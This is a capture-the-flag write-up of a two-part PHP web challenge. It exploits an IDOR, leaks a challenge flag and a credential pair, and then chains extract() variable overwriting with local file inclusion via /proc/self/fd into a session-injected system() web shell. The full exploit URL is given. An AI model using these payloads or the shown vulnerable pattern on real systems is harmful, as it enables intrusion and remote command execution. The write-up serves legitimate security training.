Les crèmes de Mamie Loic (1/2)

The first challenge was an IDOR.
We have to get the basket of the user mamie, so we can just change /api/getbasket?name=YOUR_USER to /api/getbasket?name=mamie and get the flag : https://les-cremes-de-madame-loic.ctf.bzh:21000/api/getbasket?name=mamie

La recette secrete est composee de :
- Lait
- Un maximum de BZHCTF{m4m13_n4_p4s_4ppr1s_d3_c3s_3err3urs!!}
- Caramel
Il faudra aussi penser a mettre des images pour les produits et a gerer la migration de base de donnees, l'implémentation a commencé ici : /mamiesecret
Pour se faire, n'oublie pas d'utiliser les identifiants suivants :
- mamiemanager / sxEpnMggi8LtD1y198Iy

Les crèmes de Mamie Loic (2/2)

We now have the credentials for the user mamiemanager and the knowledge of the endpoint /mamiesecret.
Here is the source code :

  1 <?php
  2 session_start();
  3 if(!isset($_SESSION["name"]) && $_SESSION["name"] !== "mamiemanager")
  4 {
  5     header("Location: /");
  6     die();
  7 }
  9 extract($_GET);
 11 if(isset($page)) include("pages/".$page);
 12 else include("pages/factures.php");
 14 if(isset($source))
 15 {
 16     die(show_source($_SERVER["SCRIPT_FILENAME"]));
 17 }
 18 ?>

This is the documentation of the function extract :

extract — Import variables into the current symbol table from an array

Do not use extract() on untrusted data, like user input (e.g. $_GET, $_FILES).

The LFI at the line 11 is obvious.
We can exploit the call to extract to overwrite $_SERVER["SCRIPT_FILENAME"] and get an arbitrary file read, but it won’t be useful here.
With the LFI, we can include file in /proc/self/fd/ which contains the list of files opened by the current process.
With a bit of bruteforce we find the session file at /proc/self/fd/10. The variable name is already there, we can use the call to extract to overwrite it and insert some php code : https://les-cremes-de-madame-loic.ctf.bzh:21000/mamiesecret?page=../../../../../../../../../../../../proc/self/fd/10&_SESSION[name]=<?php echo system($_GET["cmd"]);?>&cmd=id
